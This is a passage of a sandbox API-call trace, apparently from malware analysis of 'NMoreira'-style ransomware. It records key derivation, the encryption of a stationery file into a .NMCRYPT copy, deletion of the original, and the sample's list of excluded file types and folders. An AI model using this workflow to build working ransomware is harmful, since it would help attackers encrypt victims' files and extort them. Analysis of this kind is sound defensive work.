[0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.813] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.813] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.813] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d184 | out: phHash=0x60d184) returned 1 [0164.814] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.814] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x60d188 | out: phKey=0x60d188*=0x9ad878) returned 1 [0164.814] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.814] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.814] wcslen (_String="\\\\?\\") returned 0x4 [0164.814] CryptDuplicateKey (in: hKey=0x9ad878, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0164.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a4 [0164.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0164.814] GetFileSizeEx (in: hFile=0x690, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=232) returned 1 [0164.814] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.815] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0xe8, lpOverlapped=0x0) returned 1 [0164.815] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xe8, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0164.815] GetLastError () returned 0x0 [0164.816] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0164.826] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.826] WriteFile (in: hFile=0x6a4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.826] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm")) returned 0x20 [0164.826] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm", dwFileAttributes=0x20) returned 0 [0164.827] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 1 [0164.827] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm")) returned 0 [0164.827] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" [0164.827] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.827] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF74C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf74c.tmp")) returned 0xf74c [0164.827] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF74C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf74c.tmp"), dwFlags=0x1) returned 0 [0164.828] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF74C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf74c.tmp")) returned 1 [0164.828] CryptDestroyKey (hKey=0x9ad478) returned 1 [0164.828] wcslen (_String="OK") returned 0x2 [0164.828] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.828] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.828] CryptDestroyKey (hKey=0x9ad878) returned 1 [0164.828] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0164.828] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0164.828] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*NMCRYPT") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*Recovers your files.html") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*.exe") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*.dll") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*.lnk") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*.bat") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*.ini") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*.msi") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*.scf") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*pagefile.sys*") returned 0 [0164.828] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*AppData*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*\\winrar\\*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*\\java\\*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*\\windows\\*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*\\ESET\\*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*\\AVG\\*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*Atheros*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*Realtek*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*bootmgr*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*boot*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*boot*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*IO.SYS*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*ntldr*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*chrome*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*opera*") returned 0 [0164.829] PathMatchSpecW (pszFile="Peacock.jpg", pszSpec="*firefox*") returned 0 [0164.829] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg", pszSpec="*") returned 1 [0164.829] strlen (_Str="NMoreira") returned 0x8 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.829] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 